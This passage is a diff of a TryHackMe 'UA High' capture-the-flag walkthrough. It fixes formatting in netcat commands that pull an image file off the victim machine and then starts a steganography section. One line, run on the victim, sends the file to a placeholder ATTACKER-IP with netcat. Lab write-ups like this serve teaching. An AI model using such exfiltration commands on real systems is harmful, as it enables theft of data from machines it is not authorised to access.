darthturgle1/TryHackMe_Walkthroughs/UA_High.md

 I recalled that only one image was used in the victim's website, meaning one of these files must be the "unused file" referenced by the hint!
 I used the following to transfer it to my local machine:

-`nc -l -p 4444 > oneforall.jpg' (on my attacker machine)
+`nc -l -p 4444 > oneforall.jpg` (on my attacker machine)

-'nc -w 3 {ATTACKER-IP} 4444 < oneforall.jpg' (on the victim machine; remember to replace ATTACKER-IP with your individual attacker IP.)
+`nc -w 3 {ATTACKER-IP} 4444 < oneforall.jpg` (on the victim machine; remember to replace ATTACKER-IP with your individual attacker IP.)

-**Note**: Like the PHP script earlier, you don't have to understand the workings of these commands.
+**Note**: Like the PHP script earlier, you don't have to understand the workings of these commands for the purposes of this room.
 Even I had to use Nakkaya.com as a reference (https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/).
 Long story short, remember that **these commands are moving the image to our machine** for further analysis.

 ## Steganography (finding hidden data in an image)
 On my attacker machine, I double clicked **oneforall.jpg** to display the image.
 To my surprise, I received this message: **"Error interpreting JPEG image file (Not a JPEG file: starts with 0x89 0x50)."**